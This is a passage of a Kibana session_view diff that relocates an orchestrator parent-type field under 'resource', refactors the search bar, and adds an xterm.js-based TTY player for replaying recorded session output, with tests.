'kube-system', cluster: { name: 'elastic-k8s-cluster', id: 'PLACEHOLDER_FOR_CLUSTER.ID', }, - parent: { - type: 'PLACEHOLDER_FOR_PARENT.TYPE', - }, }; const MOCK_CLOUD_DATA: ProcessEventCloud = { @@ -164,15 +164,15 @@ describe('detail panel host tab helpers tests', () => { name: undefined, type: 'pod', ip: undefined, + parent: { + type: 'PLACEHOLDER_FOR_RESOURCE.PARENT.TYPE', + }, }, namespace: 'kube-system', cluster: { name: 'elastic-k8s-cluster', id: undefined, }, - parent: { - type: 'PLACEHOLDER_FOR_PARENT.TYPE', - }, }); expect(result.resource.name).toEqual(DASH); expect(result.resource.type).toEqual(MOCK_ORCHESTRATOR_DATA?.resource?.type); @@ -180,7 +180,7 @@ describe('detail panel host tab helpers tests', () => { expect(result.namespace).toEqual(MOCK_ORCHESTRATOR_DATA?.namespace); expect(result.cluster.name).toEqual(MOCK_ORCHESTRATOR_DATA?.cluster?.name); expect(result.cluster.id).toEqual(DASH); - expect(result.parent.type).toEqual(MOCK_ORCHESTRATOR_DATA?.parent?.type); + expect(result.resource.parent.type).toEqual(MOCK_ORCHESTRATOR_DATA?.resource?.parent?.type); }); it('getOchestratorData returns all data provided', () => { @@ -191,7 +191,7 @@ describe('detail panel host tab helpers tests', () => { expect(result.namespace).toEqual(MOCK_ORCHESTRATOR_DATA?.namespace); expect(result.cluster.name).toEqual(MOCK_ORCHESTRATOR_DATA?.cluster?.name); expect(result.cluster.id).toEqual(MOCK_ORCHESTRATOR_DATA?.cluster?.id); - expect(result.parent.type).toEqual(MOCK_ORCHESTRATOR_DATA?.parent?.type); + expect(result.resource.parent.type).toEqual(MOCK_ORCHESTRATOR_DATA?.resource?.parent?.type); }); it('getCloudData returns dashes for missing fields', () => { diff --git a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.ts b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.ts index 7254f57cc93c6..f4da70e5927bc 100644 --- a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.ts +++ b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.ts @@ -94,15 +94,15 @@ export const getOrchestratorData = ( name: DASH, type: DASH, ip: DASH, + parent: { + type: DASH, + }, }, namespace: DASH, cluster: { name: DASH, id: DASH, }, - parent: { - type: DASH, - }, }; if (!orchestrator) { @@ -115,7 +115,9 @@ export const getOrchestratorData = ( detailPanelOrchestrator.namespace = dataOrDash(orchestrator?.namespace).toString(); detailPanelOrchestrator.cluster.name = dataOrDash(orchestrator?.cluster?.name).toString(); detailPanelOrchestrator.cluster.id = dataOrDash(orchestrator?.cluster?.id).toString(); - detailPanelOrchestrator.parent.type = dataOrDash(orchestrator?.parent?.type).toString(); + detailPanelOrchestrator.resource.parent.type = dataOrDash( + orchestrator?.resource?.parent?.type + ).toString(); return detailPanelOrchestrator; }; diff --git a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.test.tsx b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.test.tsx index 6fce4f3f33a13..ba530805c80dc 100644 --- a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.test.tsx +++ b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.test.tsx @@ -41,9 +41,9 @@ const TEST_ORCHESTRATOR_RESOURCE_NAME = 'pdcsi-node-6hvsp'; const TEST_ORCHESTRATOR_RESOURCE_TYPE = 'pod'; const TEST_ORCHESTRATOR_RESOURCE_IP = 'PLACEHOLDER_FOR_RESOURCE.IP'; const TEST_ORCHESTRATOR_NAMESPACE = 'kube-system'; -const TEST_ORCHESTRATOR_PARENT_TYPE = 'elastic-k8s-cluster'; +const TEST_ORCHESTRATOR_RESOURCE_PARENT_TYPE = 'elastic-k8s-cluster'; const TEST_ORCHESTRATOR_CLUSTER_ID = 'PLACEHOLDER_FOR_CLUSTER.ID'; -const TEST_ORCHESTRATOR_CLUSTER_NAME = 'PLACEHOLDER_FOR_PARENT.TYPE'; +const TEST_ORCHESTRATOR_CLUSTER_NAME = 'PLACEHOLDER_FOR_CLUSTER.NAME'; // Cloud data const TEST_CLOUD_INSTANCE_NAME = 'gke-cluster-1-paulo-default-pool-f0fea4ab-lhx2'; @@ -86,15 +86,15 @@ const TEST_ORCHESTRATOR: ProcessEventOrchestrator = { name: TEST_ORCHESTRATOR_RESOURCE_NAME, type: TEST_ORCHESTRATOR_RESOURCE_TYPE, ip: TEST_ORCHESTRATOR_RESOURCE_IP, + parent: { + type: TEST_ORCHESTRATOR_RESOURCE_PARENT_TYPE, + }, }, namespace: TEST_ORCHESTRATOR_NAMESPACE, cluster: { name: TEST_ORCHESTRATOR_CLUSTER_NAME, id: TEST_ORCHESTRATOR_CLUSTER_ID, }, - parent: { - type: TEST_ORCHESTRATOR_PARENT_TYPE, - }, }; const TEST_CLOUD: ProcessEventCloud = { @@ -215,14 +215,14 @@ describe('DetailPanelMetadataTab component', () => { expect(renderResult.queryByText('resource.type')).toBeVisible(); expect(renderResult.queryByText('resource.ip')).toBeVisible(); expect(renderResult.queryByText('namespace')).toBeVisible(); - expect(renderResult.queryByText('parent.type')).toBeVisible(); + expect(renderResult.queryByText('resource.parent.type')).toBeVisible(); expect(renderResult.queryByText('cluster.id')).toBeVisible(); expect(renderResult.queryByText('cluster.name')).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_RESOURCE_NAME)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_RESOURCE_TYPE)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_RESOURCE_IP)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_NAMESPACE)).toBeVisible(); - expect(renderResult.queryByText(TEST_ORCHESTRATOR_PARENT_TYPE)).toBeVisible(); + expect(renderResult.queryByText(TEST_ORCHESTRATOR_RESOURCE_PARENT_TYPE)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_CLUSTER_ID)).toBeVisible(); expect(renderResult.queryByText(TEST_ORCHESTRATOR_CLUSTER_NAME)).toBeVisible(); diff --git a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.tsx b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.tsx index 77a2324bddfc5..797f6c725dfb6 100644 --- a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.tsx +++ b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/index.tsx @@ -433,6 +433,19 @@ export const DetailPanelMetadataTab = ({ ), }, + { + title: resource.parent.type, + description: ( + + + {orchestratorData.resource.parent.type} + + + ), + }, { title: namespace, description: ( @@ -472,19 +485,6 @@ export const DetailPanelMetadataTab = ({ ), }, - { - title: parent.type, - description: ( - - - {orchestratorData.parent.type} - - - ), - }, ]} /> diff --git a/x-pack/plugins/session_view/public/components/process_tree/hooks.ts b/x-pack/plugins/session_view/public/components/process_tree/hooks.ts index 3b33db65f8274..5369e6a3f2827 100644 --- a/x-pack/plugins/session_view/public/components/process_tree/hooks.ts +++ b/x-pack/plugins/session_view/public/components/process_tree/hooks.ts @@ -140,7 +140,7 @@ export class ProcessImpl implements Process { } hasOutput() { - return !!this.findEventByAction(this.events, EventAction.output); + return !!this.findEventByAction(this.events, EventAction.text_output); } hasAlerts() { diff --git a/x-pack/plugins/session_view/public/components/session_view/hooks.ts b/x-pack/plugins/session_view/public/components/session_view/hooks.ts index f695fb0d3a871..2d24305cc02d7 100644 --- a/x-pack/plugins/session_view/public/components/session_view/hooks.ts +++ b/x-pack/plugins/session_view/public/components/session_view/hooks.ts @@ -20,8 +20,10 @@ import { PROCESS_EVENTS_PER_PAGE, ALERTS_PER_PAGE, ALERT_STATUS_ROUTE, + GET_TOTAL_IO_BYTES_ROUTE, QUERY_KEY_PROCESS_EVENTS, QUERY_KEY_ALERTS, + QUERY_KEY_GET_TOTAL_IO_BYTES, } from '../../../common/constants'; export const useFetchSessionViewProcessEvents = ( @@ -187,6 +189,30 @@ export const useFetchAlertStatus = ( return query; }; +// TODO: we should not load by session id, but instead a combo of process.tty.major+minor, session time range, and host.boot_id (see Rabbitholes section of epic). +export const useFetchGetTotalIOBytes = (sessionEntityId: string) => { + const { http } = useKibana().services; + const cachingKeys = [QUERY_KEY_GET_TOTAL_IO_BYTES, sessionEntityId]; + const query = useQuery( + cachingKeys, + async () => { + return http.get(GET_TOTAL_IO_BYTES_ROUTE, { + query: { + sessionEntityId, + }, + }); + }, + { + refetchOnWindowFocus: false, + refetchOnMount: false, + refetchOnReconnect: false, + cacheTime: 0, + } + ); + + return query; +}; + export const useSearchQuery = () => { const [searchQuery, setSearchQuery] = useState(''); const onSearch = ({ query }: EuiSearchBarOnChangeArgs) => { diff --git a/x-pack/plugins/session_view/public/components/session_view/index.test.tsx b/x-pack/plugins/session_view/public/components/session_view/index.test.tsx index 159a3782be259..26b5d9c3cc7f9 100644 --- a/x-pack/plugins/session_view/public/components/session_view/index.test.tsx +++ b/x-pack/plugins/session_view/public/components/session_view/index.test.tsx @@ -12,6 +12,7 @@ import { AppContextTestRender, createAppRootMockRenderer } from '../../test'; import { SessionView } from '.'; import userEvent from '@testing-library/user-event'; import { useDateFormat } from '../../hooks'; +import { GET_TOTAL_IO_BYTES_ROUTE, PROCESS_EVENTS_ROUTE } from '../../../common/constants'; jest.mock('../../hooks/use_date_format'); const mockUseDateFormat = useDateFormat as jest.Mock; @@ -135,5 +136,45 @@ describe('SessionView component', () => { expect(renderResult.getAllByTestId('sessionView:sessionViewRefreshButton')).toBeTruthy(); }); }); + + describe('TTYPlayer button', () => { + it('should show tty player button, if session has output', async () => { + mockedApi.mockImplementation(async (path: any) => { + if (path === PROCESS_EVENTS_ROUTE) { + return sessionViewProcessEventsMock; + } else if (path === GET_TOTAL_IO_BYTES_ROUTE) { + return 1024; + } + + return 0; + }); + + render(); + await waitForApiCall(); + + expect(renderResult.queryByTestId('sessionView:TTYPlayerToggle')).toBeTruthy(); + }); + + it('should NOT show tty player button, if session has no output', async () => { + mockedApi.mockImplementation(async (options) => { + // for some reason the typescript interface for options says its an object with a field called path. + // in reality options is a string (which equals the path...) + const path = String(options); + + if (path === PROCESS_EVENTS_ROUTE) { + return sessionViewProcessEventsMock; + } else if (path === GET_TOTAL_IO_BYTES_ROUTE) { + return 0; + } + + return 0; + }); + + render(); + await waitForApiCall(); + + expect(renderResult.queryByTestId('sessionView:TTYPlayerToggle')).toBeFalsy(); + }); + }); }); }); diff --git a/x-pack/plugins/session_view/public/components/session_view/index.tsx b/x-pack/plugins/session_view/public/components/session_view/index.tsx index 1c099e056df88..e2d795283c7ce 100644 --- a/x-pack/plugins/session_view/public/components/session_view/index.tsx +++ b/x-pack/plugins/session_view/public/components/session_view/index.tsx @@ -16,7 +16,6 @@ import { EuiBetaBadge, EuiButtonIcon, } from '@elastic/eui'; -import { i18n } from '@kbn/i18n'; import { FormattedMessage } from '@kbn/i18n-react'; import useLocalStorage from 'react-use/lib/useLocalStorage'; import { SectionLoading } from '../../shared_imports'; @@ -31,17 +30,16 @@ import { SessionViewDeps } from '../../types'; import { SessionViewDetailPanel } from '../session_view_detail_panel'; import { SessionViewSearchBar } from '../session_view_search_bar'; import { SessionViewDisplayOptions } from '../session_view_display_options'; +import { TTYPlayer } from '../tty_player'; import { useStyles } from './styles'; import { useFetchAlertStatus, useFetchSessionViewProcessEvents, useFetchSessionViewAlerts, + useFetchGetTotalIOBytes, } from './hooks'; import { LOCAL_STORAGE_DISPLAY_OPTIONS_KEY } from '../../../common/constants'; - -const BETA = i18n.translate('xpack.sessionView.beta', { - defaultMessage: 'Beta', -}); +import { BETA, REFRESH_SESSION, OPEN_TTY_PLAYER } from './translations'; /** * The main wrapper component for the session view. @@ -61,6 +59,7 @@ export const SessionView = ({ jumpToCursor = undefined; } + const [showTTY, setShowTTY] = useState(false); const [isDetailOpen, setIsDetailOpen] = useState(false); const [selectedProcess, setSelectedProcess] = useState(null); const [searchQuery, setSearchQuery] = useState(''); @@ -86,6 +85,10 @@ export const SessionView = ({ return !!(!displayOptions?.verboseMode && searchQuery && searchResults?.length === 0); }, [displayOptions?.verboseMode, searchResults, searchQuery]); + const onToggleTTY = useCallback(() => { + setShowTTY(!showTTY); + }, [showTTY]); + const onProcessSelected = useCallback((process: Process | null) => { setSelectedProcess(process); }, []); @@ -159,6 +162,9 @@ export const SessionView = ({ fetchAlertStatus[0] ?? '' ); + const { data: totalTTYOutputBytes } = useFetchGetTotalIOBytes(sessionEntityId); + const hasTTYOutput = !!totalTTYOutputBytes; + useEffect(() => { if (newUpdatedAlertsStatus) { setUpdatedAlertsStatus({ ...newUpdatedAlertsStatus }); @@ -167,6 +173,19 @@ export const SessionView = ({ } }, [newUpdatedAlertsStatus, fetchAlertStatus]); + const onSearchIndexChange = useCallback( + (index: number) => { + if (searchResults) { + const process = searchResults[index]; + + if (process) { + onProcessSelected(process); + } + } + }, + [onProcessSelected, searchResults] + ); + const handleOnAlertDetailsClosed = useCallback((alertUuid: string) => { setFetchAlertStatus([alertUuid]); }, []); @@ -228,142 +247,162 @@ export const SessionView = ({ } return ( - <> -
- - - - - - - - +
+ + + + + + + + + + + + + {hasTTYOutput && ( + )} - - + + + + + + - + + + + + + + {(EuiResizablePanel, EuiResizableButton, { togglePanel }) => { + detailPanelCollapseFn.current = () => { + togglePanel?.('session-detail-panel', { direction: 'left' }); + }; - - + + {hasError && ( + + + + } + body={ +

+ +

+ } + /> + )} + + {hasData && ( +
+ +
+ )} + + + + - - - - - - - - {(EuiResizablePanel, EuiResizableButton, { togglePanel }) => { - detailPanelCollapseFn.current = () => { - togglePanel?.('session-detail-panel', { direction: 'left' }); - }; - - return ( - <> - - {hasError && ( - - - - } - body={ -

- -

- } - /> - )} - - {hasData && ( -
- -
- )} - - - - - - - - ); - }} - -
- + + + ); + }} + + {showTTY && ( + + )} +
); }; // eslint-disable-next-line import/no-default-export diff --git a/x-pack/plugins/session_view/public/components/session_view/styles.ts b/x-pack/plugins/session_view/public/components/session_view/styles.ts index 0b05f3b9d9c9b..c532ef1371b40 100644 --- a/x-pack/plugins/session_view/public/components/session_view/styles.ts +++ b/x-pack/plugins/session_view/public/components/session_view/styles.ts @@ -46,6 +46,7 @@ export const useStyles = ({ height = 500, isFullScreen }: StylesDeps) => { }; const sessionViewerComponent: CSSObject = { + position: 'relative', border: border.thin, borderRadius: border.radius.medium, '.sessionViewerToolbar': { diff --git a/x-pack/plugins/session_view/public/components/session_view/translations.ts b/x-pack/plugins/session_view/public/components/session_view/translations.ts new file mode 100644 index 0000000000000..244a5a355b0ec --- /dev/null +++ b/x-pack/plugins/session_view/public/components/session_view/translations.ts @@ -0,0 +1,19 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { i18n } from '@kbn/i18n'; + +export const BETA = i18n.translate('xpack.sessionView.beta', { + defaultMessage: 'Beta', +}); + +export const REFRESH_SESSION = i18n.translate('xpack.sessionView.refreshSession', { + defaultMessage: 'Refresh session', +}); + +export const OPEN_TTY_PLAYER = i18n.translate('xpack.sessionView.openTTYPlayer', { + defaultMessage: 'Open TTY player', +}); diff --git a/x-pack/plugins/session_view/public/components/session_view_search_bar/index.test.tsx b/x-pack/plugins/session_view/public/components/session_view_search_bar/index.test.tsx index dd758529530ba..8b3498f2a11b8 100644 --- a/x-pack/plugins/session_view/public/components/session_view_search_bar/index.test.tsx +++ b/x-pack/plugins/session_view/public/components/session_view_search_bar/index.test.tsx @@ -16,23 +16,28 @@ describe('SessionViewSearchBar component', () => { let render: () => ReturnType; let renderResult: ReturnType; let mockedContext: AppContextTestRender; + let props = { + searchQuery: 'ls', + totalMatches: 0, + onNext: jest.fn((query) => query), + onPrevious: jest.fn((query) => query), + setSearchQuery: jest.fn((query) => query), + }; beforeEach(() => { mockedContext = createAppRootMockRenderer(); + + props = { + searchQuery: 'ls', + totalMatches: 0, + onNext: jest.fn((query) => query), + onPrevious: jest.fn((query) => query), + setSearchQuery: jest.fn((query) => query), + }; }); it('handles a typed search query', async () => { - const mockSetSearchQuery = jest.fn((query) => query); - const mockOnProcessSelected = jest.fn((process) => process); - - renderResult = mockedContext.render( - - ); + renderResult = mockedContext.render(); const searchInput = renderResult.getByTestId('sessionView:searchBar').querySelector('input'); @@ -44,24 +49,17 @@ describe('SessionViewSearchBar component', () => { } expect(searchInput?.value).toEqual('ls -la'); - expect(mockSetSearchQuery.mock.calls.length).toBe(1); - expect(mockSetSearchQuery.mock.results[0].value).toBe('ls -la'); + expect(props.setSearchQuery.mock.calls.length).toBe(1); + expect(props.setSearchQuery.mock.results[0].value).toBe('ls -la'); }); it('shows a results navigator when searchResults provided', async () => { const processMock2 = { ...processMock }; const processMock3 = { ...processMock }; const mockResults = [processMock, processMock2, processMock3]; - const mockSetSearchQuery = jest.fn((query) => query); - const mockOnProcessSelected = jest.fn((process) => process); renderResult = mockedContext.render( - + ); const searchPagination = renderResult.getByTestId('sessionView:searchPagination'); @@ -73,6 +71,16 @@ describe('SessionViewSearchBar component', () => { userEvent.click(renderResult.getByTestId('pagination-button-next')); expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('2 of 3'); + userEvent.click(renderResult.getByTestId('pagination-button-next')); + expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('3 of 3'); + + // ensure clicking next after we reach the end doesn't cause a 4 of 3 situation. + userEvent.click(renderResult.getByTestId('pagination-button-next')); + expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('3 of 3'); + + userEvent.click(renderResult.getByTestId('pagination-button-previous')); + expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('2 of 3'); + const searchInput = renderResult.getByTestId('sessionView:searchBar').querySelector('input'); if (searchInput) { @@ -83,13 +91,8 @@ describe('SessionViewSearchBar component', () => { // after search is changed, results index should reset to 1 expect(searchPagination.querySelector(paginationTextClass)?.textContent).toEqual('1 of 3'); - // setSelectedProcess should be called 3 times: - // 1. searchResults is set so auto select first item - // 2. next button hit, so call with 2nd item - // 3. search changed, so call with first result. - expect(mockOnProcessSelected.mock.calls.length).toBe(3); - expect(mockOnProcessSelected.mock.results[0].value).toEqual(processMock); - expect(mockOnProcessSelected.mock.results[1].value).toEqual(processMock2); - expect(mockOnProcessSelected.mock.results[1].value).toEqual(processMock); + expect(props.onNext.mock.calls.length).toBe(2); + expect(props.onPrevious.mock.calls.length).toBe(1); + expect(props.onPrevious.mock.results[0].value).toEqual(1); // e.g 2 of 3, 1 because index is zero based. }); }); diff --git a/x-pack/plugins/session_view/public/components/session_view_search_bar/index.tsx b/x-pack/plugins/session_view/public/components/session_view_search_bar/index.tsx index 0cac43f39a8ec..3fa7bcaf5d829 100644 --- a/x-pack/plugins/session_view/public/components/session_view_search_bar/index.tsx +++ b/x-pack/plugins/session_view/public/components/session_view_search_bar/index.tsx @@ -4,18 +4,18 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import React, { useState, useEffect } from 'react'; +import React, { useState, useCallback } from 'react'; import { EuiSearchBar, EuiPagination } from '@elastic/eui'; import { EuiSearchBarOnChangeArgs } from '@elastic/eui'; import { i18n } from '@kbn/i18n'; -import { Process } from '../../../common/types/process_tree'; import { useStyles } from './styles'; interface SessionViewSearchBarDeps { searchQuery: string; setSearchQuery(val: string): void; - searchResults: Process[] | null; - onProcessSelected(process: Process): void; + totalMatches: number; + onPrevious: (index: number) => void; + onNext: (index: number) => void; } const translatePlaceholder = { @@ -34,11 +34,12 @@ const NO_RESULTS = i18n.translate('xpack.sessionView.searchBar.searchBarNoResult export const SessionViewSearchBar = ({ searchQuery, setSearchQuery, - onProcessSelected, - searchResults, + totalMatches, + onPrevious, + onNext, }: SessionViewSearchBarDeps) => { - const showPagination = !!searchQuery && searchResults?.length !== 0; - const noResults = !!searchQuery && searchResults?.length === 0; + const showPagination = !!searchQuery && totalMatches !== 0; + const noResults = !!searchQuery && totalMatches === 0; const styles = useStyles({ hasSearchResults: showPagination }); @@ -54,15 +55,18 @@ export const SessionViewSearchBar = ({ } }; - useEffect(() => { - if (searchResults) { - const process = searchResults[selectedResult]; + const onPageClick = useCallback( + (page: number) => { + setSelectedResult(page); - if (process) { - onProcessSelected(process); + if (page > selectedResult) { + onNext(page); + } else { + onPrevious(page); } - } - }, [searchResults, onProcessSelected, selectedResult]); + }, + [onNext, onPrevious, selectedResult] + ); return (
@@ -72,9 +76,9 @@ export const SessionViewSearchBar = ({ )} diff --git a/x-pack/plugins/session_view/public/components/tty_player/hooks.test.tsx b/x-pack/plugins/session_view/public/components/tty_player/hooks.test.tsx new file mode 100644 index 0000000000000..23f81d7941439 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/hooks.test.tsx @@ -0,0 +1,174 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { renderHook, act } from '@testing-library/react-hooks'; +import { sessionViewIOEventsMock } from '../../../common/mocks/responses/session_view_io_events.mock'; +import { useIOLines, useXtermPlayer, XtermPlayerDeps } from './hooks'; +import { ProcessEventsPage } from '../../../common/types/process_tree'; +import { DEFAULT_TTY_PLAYSPEED_MS } from '../../../common/constants'; + +describe('TTYPlayer/hooks', () => { + beforeAll(() => { + // https://stackoverflow.com/questions/39830580/jest-test-fails-typeerror-window-matchmedia-is-not-a-function + // xtermjs is using window.matchMedia, which isn't mocked in jest by default. + Object.defineProperty(window, 'matchMedia', { + writable: true, + value: jest.fn().mockImplementation((query) => ({ + matches: false, + media: query, + onchange: null, + addListener: jest.fn(), // Deprecated + removeListener: jest.fn(), // Deprecated + addEventListener: jest.fn(), + removeEventListener: jest.fn(), + dispatchEvent: jest.fn(), + })), + }); + + jest.useFakeTimers(); + }); + + describe('useIOLines', () => { + it('returns an array of "best effort" lines of tty output', async () => { + const events = sessionViewIOEventsMock?.events?.map((event) => event._source); + const initial: ProcessEventsPage[] = [{ events, total: events?.length }]; + + const { result, rerender } = renderHook(({ pages }) => useIOLines(pages), { + initialProps: { pages: initial }, + }); + + expect(result.current.length).toBeGreaterThan(0); + expect(typeof result.current[0].value).toBe('string'); + + // test memoization + let last = result.current; + rerender(); + expect(result.current === last).toBeTruthy(); + last = result.current; + rerender({ pages: [...initial] }); + expect(result.current === last).toBeFalsy(); + }); + }); + + describe('useXtermPlayer', () => { + let initialProps: XtermPlayerDeps; + + beforeEach(() => { + const events = sessionViewIOEventsMock?.events?.map((event) => event._source); + const pages: ProcessEventsPage[] = [{ events, total: events?.length }]; + const { result } = renderHook(() => useIOLines(pages)); + const lines = result.current; + const div = document.createElement('div'); + const mockRef = { current: div }; + initialProps = { + ref: mockRef, + isPlaying: false, + lines, + hasNextPage: false, + fetchNextPage: () => null, + isFullscreen: false, + }; + }); + + it('mounts and renders the first line of output', async () => { + const { result: xTermResult } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + const { terminal, currentLine, seekToLine } = xTermResult.current; + + // there is a minor delay in updates to xtermjs after writeln is called. + jest.advanceTimersByTime(100); + + // check that first line rendered in xtermjs + expect(terminal.buffer.active.getLine(0)?.translateToString(true)).toBe('256'); + expect(currentLine).toBe(0); + + act(() => { + seekToLine(17); // line where vim output starts + }); + + jest.advanceTimersByTime(100); + + expect(terminal.buffer.active.getLine(0)?.translateToString(true)).toBe('#!/bin/env bash'); + }); + + it('allows the user to seek to any line of output', async () => { + const { result: xTermResult } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + act(() => { + xTermResult.current.seekToLine(17); // line where vim output starts + }); + + jest.advanceTimersByTime(100); + + const { terminal, currentLine } = xTermResult.current; + + expect(currentLine).toBe(17); + expect(terminal.buffer.active.getLine(0)?.translateToString(true)).toBe('#!/bin/env bash'); + }); + + it('allows the user to play', async () => { + const { result, rerender } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + rerender({ ...initialProps, isPlaying: true }); + + act(() => { + jest.advanceTimersByTime(DEFAULT_TTY_PLAYSPEED_MS * 10); + }); + + expect(result.current.currentLine).toBe(10); + }); + + it('allows the user to stop', async () => { + const { result, rerender } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + rerender({ ...initialProps, isPlaying: true }); + act(() => { + jest.advanceTimersByTime(DEFAULT_TTY_PLAYSPEED_MS * 10); + }); + rerender({ ...initialProps, isPlaying: false }); + act(() => { + jest.advanceTimersByTime(DEFAULT_TTY_PLAYSPEED_MS * 10); + }); + expect(result.current.currentLine).toBe(10); // should still be ten. + }); + + it('should stop when it reaches the end of the array of lines', async () => { + const { result, rerender } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + rerender({ ...initialProps, isPlaying: true }); + act(() => { + jest.advanceTimersByTime(DEFAULT_TTY_PLAYSPEED_MS * initialProps.lines.length + 100); + }); + expect(result.current.currentLine).toBe(initialProps.lines.length); + }); + + it('will allow a plain text search highlight on the last line printed', async () => { + const { result: xTermResult } = renderHook((props) => useXtermPlayer(props), { + initialProps, + }); + + jest.advanceTimersByTime(100); + + act(() => { + xTermResult.current.search('256', 0); + }); + + const { terminal } = xTermResult.current; + + expect(terminal.getSelection()).toBe('256'); + }); + }); +}); diff --git a/x-pack/plugins/session_view/public/components/tty_player/hooks.ts b/x-pack/plugins/session_view/public/components/tty_player/hooks.ts new file mode 100644 index 0000000000000..a37f8899d0ed4 --- /dev/null +++ b/x-pack/plugins/session_view/public/components/tty_player/hooks.ts @@ -0,0 +1,230 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { Terminal } from 'xterm'; +import 'xterm/css/xterm.css'; +import { FitAddon } from 'xterm-addon-fit'; +import { useMemo, useState, useEffect, useCallback } from 'react'; +import { useInfiniteQuery } from 'react-query'; +import { CoreStart } from '@kbn/core/public'; +import { useKibana } from '@kbn/kibana-react-plugin/public'; +import { SearchAddon } from './xterm_search'; +import { useEuiTheme } from '../../hooks'; +import { + IOLine, + ProcessEvent, + ProcessEventResults, + ProcessEventsPage, +} from '../../../common/types/process_tree'; +import { + IO_EVENTS_ROUTE, + IO_EVENTS_PER_PAGE, + QUERY_KEY_IO_EVENTS, + DEFAULT_TTY_PLAYSPEED_MS, +} from '../../../common/constants'; + +export const useFetchIOEvents = (sessionEntityId: string) => { + const { http } = useKibana().services; + const cachingKeys = useMemo(() => [QUERY_KEY_IO_EVENTS, sessionEntityId], [sessionEntityId]); + + const query = useInfiniteQuery( + cachingKeys, + async ({ pageParam = {} }) => { + const { cursor } = pageParam; + const res = await http.get(IO_EVENTS_ROUTE, { + query: { + sessionEntityId, + cursor, + }, + }); + + const events = res.events?.map((event: any) => event._source as ProcessEvent) ?? []; + + return { events, cursor, total: res.total }; + }, + { + getNextPageParam: (lastPage) => { + if (lastPage.events.length >= IO_EVENTS_PER_PAGE) { + return { + cursor: lastPage.events[lastPage.events.length - 1]['@timestamp'], + }; + } + }, + refetchOnWindowFocus: false, + refetchOnMount: false, + refetchOnReconnect: false, + } + ); + + return query; +}; + +/** + * flattens all pages of IO events into an array of lines + * note: not efficient currently, tracking a page cursor to avoid redoing work is needed. + */ +export const useIOLines = (pages: ProcessEventsPage[] | undefined) => { + const lines: IOLine[] = useMemo(() => { + const newLines: IOLine[] = []; + + if (!pages) { + return newLines; + } + + return pages.reduce((previous, current) => { + if (current.events) { + current.events.forEach((event) => { + if (event?.process?.io?.text) { + const data: IOLine[] = event.process.io.text.split(/\n\r?/).map((line) => { + return { + value: line, + }; + }); + + previous = previous.concat(data); + } + }); + } + + return previous; + }, newLines); + }, [pages]); + + return lines; +}; + +export interface XtermPlayerDeps { + ref: React.RefObject; + isPlaying: boolean; + lines: IOLine[]; + hasNextPage?: boolean; + fetchNextPage?: () => void; + isFullscreen?: boolean; +} + +export const useXtermPlayer = ({ + ref, + isPlaying, + lines, + hasNextPage, + fetchNextPage, + isFullscreen, +}: XtermPlayerDeps) => { + const { euiTheme } = useEuiTheme(); + const { font, colors } = euiTheme; + const [currentLine, setCurrentLine] = useState(0); + const [userSeeked, setUserSeeked] = useState(false); + const [playSpeed] = useState(DEFAULT_TTY_PLAYSPEED_MS); // potentially configurable + + const [terminal, fitAddon, searchAddon] = useMemo(() => { + const term = new Terminal({ + theme: { + background: 'rgba(0,0,0,0)', + selection: colors.warning, + }, + fontFamily: font.familyCode, + fontSize: 11, + allowTransparency: true, + }); + + const fitInstance = new FitAddon(); + const searchInstance = new SearchAddon(); + + term.loadAddon(fitInstance); + term.loadAddon(searchInstance); + + return [term, fitInstance, searchInstance]; + }, [colors, font]); + + useEffect(() => { + if (ref.current) { + terminal.open(ref.current); + } + }, [terminal, ref]); + + useEffect(() => { + // isFullscreen check is there just to avoid the necessary "unnecessary" react-hook dep + // When isFullscreen changes, e.g goes from false to true and vice versa, we need to call fit. + if (isFullscreen !== undefined) { + fitAddon.fit(); + } + }, [isFullscreen, fitAddon]); + + const render = useCallback( + (lineNumber: number) => { + if (lines.length === 0) { + return; + } + + let linesToPrint; + + if (userSeeked) { + linesToPrint = lines.slice(0, lineNumber); + terminal.clear(); + setUserSeeked(false); + } else { + linesToPrint = [lines[lineNumber]]; + } + + linesToPrint.forEach((line, index) => { + if (line?.value !== undefined) { + terminal.writeln(line.value); + } + }); + }, + [terminal, lines, userSeeked] + ); + + useEffect(() => { + if (isPlaying) { + const timer = setTimeout(() => { + if (!isPlaying) { 